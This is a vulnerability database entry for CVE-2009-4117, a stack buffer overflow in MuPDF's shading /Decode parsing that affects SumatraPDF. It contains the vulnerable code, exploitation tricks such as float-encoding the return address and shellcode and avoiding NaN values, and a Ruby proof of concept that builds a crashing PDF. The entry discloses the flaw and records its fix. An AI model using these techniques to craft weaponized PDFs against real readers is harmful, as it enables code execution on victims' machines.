ID
VAR-E-200911-0049
CVE
| cve_id: | CVE-2009-4117 | Trust: 1.9 |
EDB ID
10244
TITLE
MuPDF < 20091125231942 - 'pdf_shade4.c' Multiple Stack Buffer Overflows - Windows local Exploit
Trust: 0.6
DESCRIPTION
MuPDF < 20091125231942 - 'pdf_shade4.c' Multiple Stack Buffer Overflows. CVE-2009-4117CVE-60609 . local exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | mupdf | model: | - | scope: | lt | version: | 20091125231942 | Trust: 1.0 |
| vendor: | krzysztof | model: | kowalczyk sumatra pdf | scope: | eq | version: | 0.9.4 | Trust: 0.3 |
| vendor: | krzysztof | model: | kowalczyk sumatra pdf | scope: | eq | version: | 0.4 | Trust: 0.3 |
| vendor: | krzysztof | model: | kowalczyk sumatra pdf | scope: | eq | version: | 0.3 | Trust: 0.3 |
| vendor: | krzysztof | model: | kowalczyk sumatra pdf | scope: | eq | version: | 0.2 | Trust: 0.3 |
| vendor: | krzysztof | model: | kowalczyk sumatra pdf | scope: | eq | version: | 0.1 | Trust: 0.3 |
| vendor: | artifex | model: | mupdf | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | krzysztof | model: | kowalczyk sumatra pdf | scope: | ne | version: | 1.0.1 | Trust: 0.3 |
| vendor: | artifex | model: | mupdf | scope: | ne | version: | 2009112523194 | Trust: 0.3 |
EXPLOIT
"MuPDF is a lightweight PDF viewer and toolkit written in portable C".
It is used in particular by SumatraPDF which is a small open-source
PDF viewer for Windows.
MuPDF before commit 20091125231942 did not properly handle /Decode
arrays in a shading of type 4 to 7, leading to a stack-based buffer
overflow. Version 1.0.1 of SumatraPDF integrates this correction and
is no longer vulnerable -- it is recommended to upgrade to this version.
In addition, SumatraPDF 1.1 will have DEP enabled permanently on XP/
Vista/7 (through NtSetInformationProcess), as well as being marked
ASLR-compatible.
Timeline
========
2009-11-23 MuPDF and SumatraPDF contacted
2009-11-25 fix integrated
2009-11-28 SumatraPDF 1.0.1 released
Details
=======
The vulnerable code is shown below:
float c0[FZ_MAXCOLORS];
float c1[FZ_MAXCOLORS];
...
obj = fz_dictgets(shading, "Decode");
if (fz_isarray(obj))
{
...
for (i=0; i < fz_arraylen(obj) / 2; ++i) {
c0[i] = fz_toreal(fz_arrayget(obj, i*2+4));
c1[i] = fz_toreal(fz_arrayget(obj, i*2+5));
}
}
Although SumatraPDF is compiled with /GS, for some reason Visual Studio
2008 failed to flag the vulnerable function. Thus, exploitation is not
particularly difficult, although there are a few tricks:
* Care must be taken not to overwrite the obj pointer on the stack,
as it would lead to a crash. Fortunately, the i variable is
overwritten first, so one can simply increment it to skip obj.
* The overwritten array handles a bunch of floating point values.
So all hexadecimal values (such as the overwritten eip) must be
converted into a floting point value, but not using scientific
notation because the MuPDf parser cannot handle it.
For example, 0x33 will be encoded as
0.000000000000000000000000000000000000000000071
* All 32-bit chunks of the shellcode need to have a valid floating
point counterpart: no value must correspond to an IEEE 754 "NaN"
(not a number). In practice, this can be easily achieved by
inserting NOPs.
The origami PDF framework (see http://www.security-labs.org/origami/)
may be used to test this vulnerability. The following ruby script creates
a PDF with an oversized /Decode array:
# MuPDF pdf_loadtype4shade() PoC code (crash only)
# authors: Christophe Devine and Guillaume Delugré
$: << "sources/parser"
require 'parser.rb'
include Origami
sploit = [ 1234 ] * 250
shader = Graphics::Pattern::Shading::FreeFormTriangleMesh.new
shader.ColorSpace = Graphics::Color::Space::DEVICE_RGB
shader.BitsPerCoordinate = 24
shader.BitsPerComponent = 16
shader.BitsPerFlag = 8
shader.Decode = sploit
page = Page.new.add_shading(:kikoo, shader)
page.Contents = ContentStream.new
page.Contents.paint_shading(:kikoo)
PDF.new.append_page(page).saveas('toto.pdf')
How to modify this script to successfully exploit the vulnerability
is left as an exercise for the reader ;) Metasploit 3.3 was
used for the creation of the shellcode. This poc will not work with
other versions of SumatraPDF as it uses a jmp esp in the binary.
Greetz
======
#lab, #chaussette, #barbux, hzv, t0ka7a, c+v, al4mbic et pizza_pino
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'pdf_shade4.c' Multiple Stack Buffer Overflows
Trust: 1.0
CREDITS
Christophe Devine
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2009-4117 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 10244 | Trust: 1.6 |
| db: | EDBNET | id: | 34235 | Trust: 0.6 |
| db: | BID | id: | 41818 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2009-4117 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/10244/ | Trust: 0.6 |
| url: | http://blog.kowalczyk.info/software/sumatrapdf/index.html | Trust: 0.3 |
| url: | http://archives.neohapsis.com/archives/fulldisclosure/2009-11/0330.html | Trust: 0.3 |
| url: | http://darcs.ghostscript.com/darcsweb.cgi?r=mupdf | Trust: 0.3 |
| url: | http://game.daum.net/ | Trust: 0.3 |
| url: | http://blog.kowalczyk.info/software/sumatrapdf/news.html | Trust: 0.3 |
SOURCES
| db: | BID | id: | 41818 |
| db: | EXPLOIT-DB | id: | 10244 |
| db: | EDBNET | id: | 34235 |
LAST UPDATE DATE
2022-07-27T09:52:46.329000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 41818 | date: | 2009-11-28T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 41818 | date: | 2009-11-28T00:00:00 |
| db: | EXPLOIT-DB | id: | 10244 | date: | 2009-11-28T00:00:00 |
| db: | EDBNET | id: | 34235 | date: | 2009-11-28T00:00:00 |